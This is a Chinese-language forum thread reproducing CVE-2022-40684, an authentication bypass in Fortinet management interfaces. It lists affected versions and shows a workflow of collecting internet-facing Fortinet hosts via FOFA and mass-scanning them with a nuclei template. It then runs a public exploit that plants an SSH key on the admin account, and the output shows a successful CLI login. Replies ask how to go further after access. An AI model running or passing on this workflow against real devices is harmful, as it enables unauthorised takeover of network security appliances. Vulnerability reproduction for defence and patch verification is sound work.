导航

cve-2022-40684漏洞复现

#1
漏洞名称:Fortinet多个产品身份验证绕过漏洞

CVE编号:CVE-2022-40684

简述:Fortinet(飞塔)是一家全球知名的网络安全产品和安全解决方案提供商,其产品包括防火墙、防病毒软件、入侵防御系统和终端安全组件等。

在受影响的FortiOS、FortiProxy 和 FortiSwitchManager产品的管理界面中,可以通过使用备用路径或通道绕过身份验证,并在未经认证的情况下通过特制的HTTP或HTTPS请求对管理界面进行操作。



目前受影响的 Fortinet版本:

FortiOS 版本 7.2.0 - 7.2.1

FortiOS 版本 7.0.0 - 7.0.6

FortiProxy 版本 7.2.0

FortiProxy 版本 7.0.0 - 7.0.6

FortiSwitchManager 版本 7.2.0

FortiSwitchManager 版本 7.0.0



准备环境:

nuclei: 漏扫

yaml文件:放置当前目录下


fofa提取关键字:Fortinet


执行命令

n\nuclei_2.7.8_windows_amd64>nuclei -t CVE-2022-40684.yaml -l subs.txt -o res.txt -v -stats

扫描出结果:



xshell生成密钥并保存为pub文件:



项目地址: https://github.com/horizon3ai/CVE-2022-40684
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh admin@10.0.40.67
fortios_7_2_1 #
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.
2022-11-09
#2
我觉得可以讲讲后续的利用方法,Ssh进去后不是底层Shell,常规Linux命令都不能执行。
念念不忘,必有回响
T00ls名片:https://t00.ls/CXAQHQ

2022-11-09
#3
下载不了了。提权通过CPU指令了吗?再讲讲吧